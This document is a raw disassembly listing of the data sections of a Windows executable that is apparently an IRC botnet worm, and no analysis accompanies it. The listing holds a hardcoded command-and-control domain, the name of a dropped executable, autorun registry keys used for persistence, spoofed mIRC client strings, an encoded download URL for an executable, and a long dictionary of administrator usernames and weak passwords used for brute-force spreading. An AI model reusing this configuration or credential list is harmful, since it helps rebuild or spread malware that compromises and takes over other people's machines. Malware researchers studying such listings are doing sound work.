dd 1Ch, 426218h, 0
dd offset off_43DB1C
align 10h
dd 0FFFFFFFFh, 0
dword_427FF8 dd 1Ch, 426282h, 3, 427FE4h, 427FC8h, 427FACh ; DATA XREF: .rdata:0042801C�o
dword_428010 dd 0 ; DATA XREF: sub_426173+2E�o
; sub_4262F6+4B�o
dd offset sub_426168
dd 0
dd offset dword_427FF8+8
dd 0FFFFFFFFh, 426AECh
dword_428028 dd 19930520h, 1, 428020h, 4 dup(0) ; DATA XREF: .text:loc_426AF4�o
dd 0FFFFFFFFh, 426AFEh
dword_42804C dd 19930520h, 1, 428044h, 4 dup(0) ; DATA XREF: .text:loc_426B06�o
dd 0FFFFFFFFh, 426B10h
dword_428070 dd 19930520h, 1, 428068h, 5 dup(0) ; DATA XREF: .text:loc_426B18�o
dd offset off_43DB3C
align 8
dd 0FFFFFFFFh, 0
dword_4280A0 dd 1Ch, 4262DEh, 3, 42808Ch, 427FC8h, 427FACh ; DATA XREF: .rdata:004280C4�o
dword_4280B8 dd 0 ; DATA XREF: sub_42629A+2E�o
; sub_4262F6+2D�o
dd offset sub_426277
dd 0
dd offset dword_4280A0+8
dd 0FFFFFFFFh, 426B22h
dword_4280D0 dd 19930520h, 1, 4280C8h, 4 dup(0) ; DATA XREF: .text:loc_426B2A�o
dword_4280EC dd 2, 427FC8h, 427FACh ; DATA XREF: .rdata:00428104�o
dword_4280F8 dd 0 ; DATA XREF: sub_4262F6+F�o
dd offset sub_4260BA
dd 0
dd offset dword_4280EC
dd 28308h, 2 dup(0)
dd 2836Eh, 271C4h, 28144h, 2 dup(0)
dd 28B82h, 27000h, 5 dup(0)
dd 2868Ah, 28B72h, 28B62h, 28B52h, 28B34h, 28B22h, 28B10h
dd 28AFCh, 28AECh, 28ADEh, 28ACEh, 28ABCh, 28AA2h, 28A8Ah
dd 28A70h, 28A56h, 28A3Ah, 28A2Ah, 28A1Ah, 28A0Eh, 289FCh
dd 289F0h, 289E6h, 289DAh, 289CAh, 289BAh, 289ACh, 28386h
dd 28394h, 283A2h, 283B4h, 283CAh, 283E0h, 283E8h, 283F8h
dd 28406h, 28414h, 2842Ah, 2843Ah, 28446h, 2845Ch, 28472h
dd 28486h, 2849Ch, 284ACh, 284BCh, 284CEh, 284DEh, 284EAh
dd 284FAh, 2850Ch, 28520h, 28532h, 28542h, 28550h, 28568h
dd 28580h, 285A8h, 285C0h, 285D6h, 285E2h, 285EEh, 28602h
dd 28610h, 28624h, 28636h, 2864Ah, 28658h, 2866Ah, 2867Ch
dd 28696h, 286AEh, 286C8h, 286D8h, 286EAh, 286FCh, 28714h
dd 2872Eh, 2874Ah, 28764h, 28780h, 28790h, 2879Eh, 287B8h
dd 287C4h, 287D0h, 287E2h, 287F4h, 28808h, 28818h, 2882Ah
dd 2883Ah, 28848h, 2885Ah, 2886Ah, 28880h, 2888Eh, 2889Ch
dd 288B8h, 288CEh, 288DAh, 288F0h, 28900h, 28914h, 2892Ah
dd 28938h, 28944h, 28956h, 28968h, 28976h, 28990h, 2899Eh
dd 0
dd 28360h, 80000007h, 8000000Fh, 8000000Ch, 80000074h
dd 80000073h, 80000015h, 8000000Ah, 80000002h, 8000000Dh
dd 80000001h, 8000000Bh, 80000009h, 80000004h, 80000010h
dd 80000003h, 80000017h, 80000013h, 80000012h, 80000097h
dd 80000006h, 0
db 41h ; A
align 2
aWsasocketa_0 db 'WSASocketA',0
align 2
aWs2_32_dll_0 db 'WS2_32.dll',0
align 2
aVersion_dll db 'VERSION.dll',0
db '¹',0
aExitprocess db 'ExitProcess',0
a4 db '4',0
aClosehandle db 'CloseHandle',0
aF_2 db 'f',0
aCreateprocessa db 'CreateProcessA',0
align 4
db 7Dh ; }
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 1C1h
aGetsystemdirec db 'GetSystemDirectoryA',0
db 56h ; V
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 6Fh ; o
align 2
aCreatethread db 'CreateThread',0
align 4
aG db 'ƒ',0
aDeletefilea db 'DeleteFileA',0
dw 286h
aOpenprocess db 'OpenProcess',0
db 43h ; C
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
dw 171h
aGetlasterror db 'GetLastError',0
align 2
aC_2 db 'C',0
aCopyfilea db 'CopyFileA',0
dw 319h
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 5Eh ; ^
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 17Fh
aGetmodulehandl db 'GetModuleHandleA',0
align 2
dw 390h
aWaitforsingleo db 'WaitForSingleObject',0
db '`',0
aCreatemutexa db 'CreateMutexA',0
align 4
db 0DFh ; ß
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 5Fh ; _
db 3, 54h, 65h
aRminatethread db 'rminateThread',0
dw 1D5h
aGettemppatha db 'GetTempPathA',0
align 2
dw 26Eh
aMovefilea db 'MoveFileA',0
dw 252h
aLoadlibrarya db 'LoadLibraryA',0
align 2
dw 1A0h
aGetprocaddress db 'GetProcAddress',0
align 4
db 14h
db 1, 47h, 65h
aTcomputernamea db 'tComputerNameA',0
align 10h
db 74h ; t
db 1, 47h, 65h
aTlocaleinfoa db 'tLocaleInfoA',0
align 2
dw 1E9h
aGetversionexa db 'GetVersionExA',0
db 'º',0
aExitthread db 'ExitThread',0
align 10h
db 51h ; Q
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
aS_6 db '˜',0
aEntercriticals db 'EnterCriticalSection',0
align 10h
db 24h ; $
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSectionAndSpinCount',0
aB db '',0
aDeletecritical db 'DeleteCriticalSection',0
db 75h ; u
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 2B5h
aReadfile_0 db 'ReadFile',0
align 2
dw 3A4h
aWritefile db 'WriteFile',0
dw 368h
aTransactnamedp db 'TransactNamedPipe',0
aS_7 db 'S',0
aCreatefilea db 'CreateFileA',0
dd 6554035Eh, 6E696D72h, 50657461h, 65636F72h, 7373h, 75440093h
dd 63696C70h, 48657461h, 6C646E61h, 1420065h
aGetcurrentproc db 'GetCurrentProcess',0
aE_0 db 'e',0
aCreatepipe db 'CreatePipe',0
align 4
dd 654701E0h, 6D695474h, 726F4665h, 4174616Dh, 1470000h
dd 44746547h, 46657461h, 616D726Fh, 4174h, 65470163h, 6C694674h
dd 7A695365h, 0CE0065h, 646E6946h, 736F6C43h, 0C50065h
aFiletimetosyst db 'FileTimeToSystemTime',0
align 2
db 'Ä',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
db 'Ü',0
aFindnextfilea db 'FindNextFileA',0
db 'Ò',0
aFindfirstfilea db 'FindFirstFileA',0
align 2
dw 31Bh
aSetfilepointer db 'SetFilePointer',0
align 4
db 0EEh ; î
db 2, 53h, 65h
aTconsolectrlha db 'tConsoleCtrlHandler',0
db 8Eh ; Ž
db 3, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 0FCh
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 2
dw 2A3h
aQueryperform_1 db 'QueryPerformanceCounter',0
db 0A4h ; ¤
db 2, 51h, 75h
aEryperformance db 'eryPerformanceFrequency',0
dd 65470173h, 636F4C74h, 69546C61h, 656Dh, 724600F8h, 694C6565h
dd 72617262h, 1590079h
aGetenvironment db 'GetEnvironmentVariableW',0
db 16h
db 2, 48h, 65h
aApfree db 'apFree',0
align 4
db 10h
db 2, 48h, 65h
aApalloc db 'apAlloc',0
db 0A3h ; £
db 1, 47h, 65h
aTprocessheap db 'tProcessHeap',0
align 2
dw 389h
aVirtualqueryex db 'VirtualQueryEx',0
align 4
db 0B8h ; ¸
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
dd 654701C5h, 73795374h, 496D6574h, 6F666Eh, 6F4600F3h
dd 74616D72h, 7373654Dh, 41656761h, 20A0000h, 626F6C47h
dd 6E556C61h, 6B636F6Ch, 2030000h, 626F6C47h, 6F4C6C61h
dd 6B63h, 6E550371h, 5670616Dh, 4F776569h, 6C694666h, 2680065h
dd 5670614Dh, 4F776569h, 6C694666h, 540065h
aCreatefilemapp db 'CreateFileMappingA',0
align 10h
db 1Fh
db 3, 53h, 65h
aTfiletime db 'tFileTime',0
dw 165h
aGetfiletime db 'GetFileTime',0
db '¼',0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
db 94h ; ”
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 3C3h
aLstrcmpia db 'lstrcmpiA',0
dw 15Ah
aGetexitcodepro db 'GetExitCodeProcess',0
align 10h
db 91h ; ‘
db 2, 50h, 65h
aEknamedpipe db 'ekNamedPipe',0
db 78h ; x
db 1, 47h, 65h
aTlogicaldrives db 'tLogicalDrives',0
align 4
db 4
db 2, 47h, 6Ch
aObalmemorystat db 'obalMemoryStatus',0
align 2
dw 21Ah
aHeaprealloc db 'HeapReAlloc',0
dd 745202D7h, 776E556Ch, 646E69h, 654701B7h, 61745374h
dd 70757472h, 6F666E49h, 1100041h, 43746547h, 616D6D6Fh
dd 694C646Eh, 41656Eh, 654701E8h, 72655674h, 6E6F6973h
dd 1580000h
aGetenvironme_0 db 'GetEnvironmentVariableA',0
dd 65480214h, 65447061h, 6F727473h, 2120079h, 70616548h
dd 61657243h, 6574h, 69560383h, 61757472h, 6572466Ch, 3810065h
dd 74726956h, 416C6175h, 636F6C6Ch, 2360000h, 61427349h
dd 69725764h, 74506574h, 1040072h, 43746547h, 666E4950h
dd 0FD006Fh, 41746547h, 5043h, 65470193h, 4D454F74h, 5043h
dd 615202A7h, 45657369h, 70656378h, 6E6F6974h, 21C0000h
dd 70616548h, 657A6953h, 2440000h, 614D434Ch, 72745370h
dd 41676E69h, 2450000h, 614D434Ch, 72745370h, 57676E69h
dd 36E0000h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
dw 0F6h
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db 0F7h ; ÷
align 2
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 155h
aGetenvironme_1 db 'GetEnvironmentStrings',0
dw 157h
aGetenvironme_2 db 'GetEnvironmentStringsW',0
align 4
db 24h ; $
db 3, 53h, 65h
aThandlecount db 'tHandleCount',0
align 2
dw 1B9h
aGetstdhandle db 'GetStdHandle',0
align 2
dw 166h
aGetfiletype db 'GetFileType',0
db 37h ; 7
db 3, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 4
aU_0 db 'î',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 10h
db 0BAh ; º
db 1, 47h, 65h
aTstringtypea db 'tStringTypeA',0
align 2
dw 1BDh
aGetstringtypew db 'GetStringTypeW',0
align 4
db 4Ah ; J
db 3, 53h, 65h
aTunhandledexce db 'tUnhandledExceptionFilter',0
dw 233h
aIsbadreadptr db 'IsBadReadPtr',0
align 2
dw 230h
aIsbadcodeptr db 'IsBadCodePtr',0
align 2
dw 310h
aSetendoffile db 'SetEndOfFile',0
align 2
aKernel32_dll_0 db 'KERNEL32.dll',0
align 10h
_rdata ends
; Section 3. (virtual address 00029000)
; Virtual size : 000B43A0 ( 738208.)
; Section size in file : 000B43A0 ( 738208.)
; Offset to raw data for section: 00029000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 429000h
dword_429000 dd 0 ; DATA XREF: sub_41C164+1F�o
dd offset loc_401205
dd offset sub_40DB3C
dd offset sub_40F0EC
dword_429010 dd 0 ; DATA XREF: sub_41C164+1A�o
dword_429014 dd 0 ; DATA XREF: sub_41C164+10�o
dd offset sub_41DA32
dd offset sub_420B0D
dd offset sub_42413E
dd offset sub_424F62
dword_429028 dd 0 ; DATA XREF: sub_41C164:loc_41C16F�o
dword_42902C dd 0 ; DATA XREF: sub_41C1B3+65�o
dd offset sub_4241E3
dword_429034 dd 0 ; DATA XREF: sub_41C1B3:loc_41C213�o
dword_429038 dd 0 ; DATA XREF: sub_41C1B3+76�o
dd offset sub_424F73
dword_429040 dd 4 dup(0) ; DATA XREF: sub_41C1B3:loc_41C224�o
dword_429050 dd 80000002h, 429170h, 80000002h, 4291A0h, 80000001h, 429170h
; DATA XREF: sub_401000+7�o
dword_429068 dd 6272h ; DATA XREF: sub_401000+63�o
; sub_4010AB+B�o ...
dword_42906C dd 1B58h ; DATA XREF: sub_401221+4A4�r
; sub_401221+539�r
dword_429070 dd 0C8Bh ; DATA XREF: sub_401221+585�r
dword_429074 dd 7E4h ; DATA XREF: sub_401ACD:loc_4045D8�r
dword_429078 dd 45h ; DATA XREF: sub_401ACD+202E�r
; sub_40BD91+3B�r
dword_42907C dd 7D1h ; DATA XREF: sub_401ACD:loc_403BE9�r
; sub_40BD91:loc_40C182�r
dword_429080 dd 201h ; DATA XREF: sub_401ACD:loc_403D75�r
word_429084 dw 7C7h ; DATA XREF: sub_401ACD:loc_4046FB�r
align 4
dword_429088 dd 1 ; DATA XREF: sub_401ACD+643�r
dword_42908C dd 1 ; DATA XREF: sub_401221+13D�r
dword_429090 dd 1 ; DATA XREF: sub_401221:loc_401562�r
; sub_4188A6+C�r
byte_429094 db 2Eh ; DATA XREF: sub_401ACD+A76�r
; sub_401ACD+B30�r ...
align 4
dword_429098 dd 0Ah ; DATA XREF: sub_40AAAC+3A�r
; sub_40AAAC+60�r ...
dword_42909C dd 4 ; DATA XREF: sub_4017ED+78�r
; sub_401ACD+279�r ...
dword_4290A0 dd 1 ; DATA XREF: sub_4017ED+72�r
; sub_401ACD+273�r
aSbrti db 'sbrti',0 ; DATA XREF: sub_401221+5D�o
; sub_401ACD:loc_40445D�o ...
align 4
aAbosel7V4 db 'abosel7 v4',0 ; DATA XREF: sub_401ACD:loc_404902�o
align 4
aCool db 'cool',0 ; DATA XREF: sub_401ACD+7BCB�o
; sub_401ACD+7C9A�o
align 10h
aScorti1_dns2go db 'scorti1.dns2go.com',0 ; DATA XREF: sub_401221+490�o
; sub_401221+52A�o
align 4
aFaak db '#FAAK#',0 ; DATA XREF: sub_401221+4B0�o
; sub_401221+540�o ...
align 4
aSaad_ db 'saad.',0 ; DATA XREF: sub_401221+4C7�o
; sub_401221+552�o
align 4
byte_4290E4 db 73h ; DATA XREF: sub_401221:loc_401789�r
; sub_401221+576�o
aCorti1_dns2go_ db 'corti1.dns2go.com',0
align 4
aFaak_0 db '#FAAK#',0 ; DATA XREF: sub_401221+58C�o
align 10h
aSaad__0 db 'saad.',0 ; DATA XREF: sub_401221+59E�o
align 4
aQunapfgq_exe db 'qunapfgq.exe',0 ; DATA XREF: sub_401221+143�o
; sub_401221+167�w ...
align 4
aWinnt_bat db 'winnt.bat',0
align 4
aWindosSeresAgn db 'Windos Seres Agnts',0 ; DATA XREF: sub_401000+E�o
align 4
asc_429138: ; DATA XREF: .text:0040AB2B�o
unicode 0, <->,0
aWinsys_dat db 'winsys.dat',0
align 4
aXI db '-x+i',0 ; DATA XREF: sub_401ACD+7D1D�o
align 10h
aF db '#f',0 ; DATA XREF: sub_401ACD+1E91�o
; sub_401ACD+1EA2�o ...
align 4
aF_0 db '#f',0 ; DATA XREF: sub_401ACD+72B4�o
; sub_401ACD+730C�o
align 4
aF_1 db '#f',0 ; DATA XREF: sub_401ACD+40EA�o
; sub_401ACD+423A�o
align 4
off_42915C dd offset a@admin_com ; DATA XREF: sub_401ACD:loc_4096EB�o
; "*@admin.com"
off_429160 dd offset aMircV6_16Khale ; DATA XREF: sub_401ACD+8A7�r
; sub_401ACD+7C3A�o
; "mIRC v6.16 Khaled Mardam-Bey"
dd offset aMircV6_17Khale ; "mIRC v6.17 Khaled Mardam-Bey"
dd offset aMircV6_20Khale ; "mIRC v6.20 Khaled Mardam-Bey"
dd offset aMircV6_21Khale ; "mIRC v6.21 Khaled Mardam-Bey"
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
align 10h
aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_41A3C6+28�o
; sub_41A6EA+28�o
align 10h
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_41A3C6+D4�o
; sub_41A6EA+D4�o
align 4
dd 2 dup(1), 70747468h, 772F2F3Ah, 662E7777h, 77656572h
dd 6F746265h, 632E6E77h, 7A2F6D6Fh, 2F737678h, 73636E76h
dd 652E6D79h, 6578h, 429938h, 429928h, 429918h, 42990Ch
dd 429904h, 4298FCh, 4298F4h, 4298ECh, 4298E0h, 4298D8h
dd 4298D0h, 4298C8h, 4298BCh, 4298B4h, 4298ACh, 4298A0h
dd 42989Ch, 429894h, 429890h, 0
dd offset byte_43DB88
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_1 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_0 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_1 ; "server"
dd offset aRoot ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser_0 ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin_1 ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp_0 ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
dword_4294CC dd 10h ; DATA XREF: sub_401ACD+AE0�r
; sub_401ACD+B0C�r ...
aIntranet db 'intranet',0 ; DATA XREF: .data:004294B8�o
align 4
aLan db 'lan',0 ; DATA XREF: .data:004294B0�o
aMain db 'main',0 ; DATA XREF: .data:004294AC�o
align 4
aWinpass db 'winpass',0 ; DATA XREF: .data:004294A8�o
aBlank db 'blank',0 ; DATA XREF: .data:004294A4�o
align 4
aOffice db 'office',0 ; DATA XREF: .data:004294A0�o
align 10h
aControl db 'control',0 ; DATA XREF: .data:0042949C�o
aXp_0 db 'xp',0 ; DATA XREF: .data:00429498�o
align 4
aNokia db 'nokia',0 ; DATA XREF: .data:00429494�o
align 4
aHp db 'hp',0 ; DATA XREF: .data:00429490�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: .data:0042948C�o
aCompaq db 'compaq',0 ; DATA XREF: .data:00429488�o
align 4
aDell db 'dell',0 ; DATA XREF: .data:00429484�o
align 10h
aCisco db 'cisco',0 ; DATA XREF: .data:00429480�o
align 4
aIbm db 'ibm',0 ; DATA XREF: .data:0042947C�o
aOrainstall db 'orainstall',0 ; DATA XREF: .data:00429474�o
align 4
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:00429470�o
align 4
aSql db 'sql',0 ; DATA XREF: .data:0042946C�o
aSa db 'sa',0 ; DATA XREF: .data:00429468�o
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .data:00429464�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .data:0042945C�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:00429458�o
align 4
aData db 'data',0 ; DATA XREF: .data:00429454�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:00429450�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:0042944C�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .data:00429448�o
align 10h
aAccess db 'access',0 ; DATA XREF: .data:00429444�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:0042943C�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: .data:00429438�o
align 4
aDomain db 'domain',0 ; DATA XREF: .data:00429434�o
align 4
aHello db 'hello',0 ; DATA XREF: .data:00429430�o
align 4
aHell db 'hell',0 ; DATA XREF: .data:0042942C�o
align 4
aGod db 'god',0 ; DATA XREF: .data:00429428�o
aSex db 'sex',0 ; DATA XREF: .data:00429424�o
; .data:off_438A68�o
aSlut db 'slut',0 ; DATA XREF: .data:00429420�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .data:0042941C�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .data:00429418�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .data:00429414�o
align 4
aBackup db 'backup',0 ; DATA XREF: .data:00429410�o
align 10h
aTechnical db 'technical',0 ; DATA XREF: .data:0042940C�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .data:00429408�o
align 4
aLogin_1 db 'login',0 ; DATA XREF: .data:00429404�o
align 10h
aMary db 'mary',0 ; DATA XREF: .data:00429400�o
align 4
aKatie db 'katie',0 ; DATA XREF: .data:004293FC�o
align 10h
aKate db 'kate',0 ; DATA XREF: .data:004293F4�o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:004293F0�o
align 10h
aEric db 'eric',0 ; DATA XREF: .data:004293EC�o
align 4
aChris db 'chris',0 ; DATA XREF: .data:004293E8�o
align 10h
aIan db 'ian',0 ; DATA XREF: .data:004293E4�o
aNeil db 'neil',0 ; DATA XREF: .data:004293E0�o
align 4
aLee db 'lee',0 ; DATA XREF: .data:004293DC�o
aBrian db 'brian',0 ; DATA XREF: .data:004293D8�o
align 4
aSusan db 'susan',0 ; DATA XREF: .data:004293D0�o
align 10h
aSue db 'sue',0 ; DATA XREF: .data:004293CC�o
aSam db 'sam',0 ; DATA XREF: .data:004293C8�o
aLuke db 'luke',0 ; DATA XREF: .data:004293C4�o
align 10h
aPeter db 'peter',0 ; DATA XREF: .data:004293C0�o
; .data:004293D4�o
align 4
aJohn db 'john',0 ; DATA XREF: .data:004293BC�o
align 10h
aMike db 'mike',0 ; DATA XREF: .data:004293B8�o
align 4
aBill db 'bill',0 ; DATA XREF: .data:004293B4�o
align 10h
aFred db 'fred',0 ; DATA XREF: .data:004293B0�o
align 4
aJoe db 'joe',0 ; DATA XREF: .data:004293AC�o
aJen db 'jen',0 ; DATA XREF: .data:004293A8�o
aBob db 'bob',0 ; DATA XREF: .data:004293A4�o
; .data:004293F8�o
aQwe db 'qwe',0 ; DATA XREF: .data:004293A0�o
aZxc db 'zxc',0 ; DATA XREF: .data:0042939C�o
aAsd db 'asd',0 ; DATA XREF: .data:00429398�o
aQaz db 'qaz',0 ; DATA XREF: .data:00429394�o
aWin2000 db 'win2000',0 ; DATA XREF: .data:00429390�o
aWinnt db 'winnt',0 ; DATA XREF: .data:0042938C�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .data:00429388�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:00429384�o
align 4
aWin98 db 'win98',0 ; DATA XREF: .data:00429380�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:0042937C�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:00429378�o
align 10h
aOemuser db 'oemuser',0 ; DATA XREF: .data:00429374�o
aOem db 'oem',0 ; DATA XREF: .data:00429370�o
aUser_0 db 'user',0 ; DATA XREF: sub_401ACD+45CF�o
; .data:0042936C�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .data:00429368�o
align 10h
aHome db 'home',0 ; DATA XREF: .data:00429364�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: .data:00429360�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:0042935C�o
align 10h
aInternet db 'internet',0 ; DATA XREF: .data:00429358�o
; .data:004294B4�o
align 4
aWww db 'www',0 ; DATA XREF: .data:00429354�o
aWeb db 'web',0 ; DATA XREF: sub_401ACD+7283�o
; .data:00429350�o
aOutlook db 'outlook',0 ; DATA XREF: .data:0042934C�o
aMail db 'mail',0 ; DATA XREF: .data:00429348�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:00429344�o
align 4
aNull_1 db 'null',0 ; DATA XREF: .data:00429340�o
align 4
aServer_1 db 'server',0 ; DATA XREF: sub_401ACD+3E8B�o
; .data:00429338�o
align 4
aSystem db 'system',0 ; DATA XREF: .data:00429334�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .data:0042932C�o
align 10h
aLinux db 'linux',0 ; DATA XREF: .data:00429328�o
align 4
aUnix db 'unix',0 ; DATA XREF: .data:00429324�o
align 10h
aDemo db 'demo',0 ; DATA XREF: .data:00429320�o
align 4
aNone db 'none',0 ; DATA XREF: .data:0042931C�o
align 10h
aTest db 'test',0 ; DATA XREF: .data:00429314�o
align 4
a2004 db '2004',0 ; DATA XREF: .data:00429310�o
align 10h
a2003 db '2003',0 ; DATA XREF: sub_41AF8F+BA�o
; .data:0042930C�o
align 4
a2002 db '2002',0 ; DATA XREF: .data:00429308�o
align 10h
a2001 db '2001',0 ; DATA XREF: .data:00429304�o
align 4
a2000 db '2000',0 ; DATA XREF: .data:00429300�o
align 10h
a1234567890 db '1234567890',0 ; DATA XREF: .data:004292FC�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .data:004292F8�o
align 4
a12345678 db '12345678',0 ; DATA XREF: .data:004292F4�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:004292F0�o
a123456 db '123456',0 ; DATA XREF: .data:004292EC�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:004292E8�o
align 4
a1234 db '1234',0 ; DATA XREF: .data:004292E4�o
align 4
a123 db '123',0 ; DATA XREF: .data:004292E0�o
a12 db '12',0 ; DATA XREF: .data:004292DC�o
align 4
a1: ; DATA XREF: .text:0040AFC7�o
; .data:004292D8�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: .data:004292D4�o
aPwd db 'pwd',0 ; DATA XREF: .data:004292D0�o
aPass_1 db 'pass',0 ; DATA XREF: .data:004292CC�o
align 10h
aPass1234 db 'pass1234',0 ; DATA XREF: .data:004292C8�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .data:004292C4�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:004292C0�o
align 10h
aPassword1 db 'password1',0 ; DATA XREF: .data:004292BC�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:004292B8�o
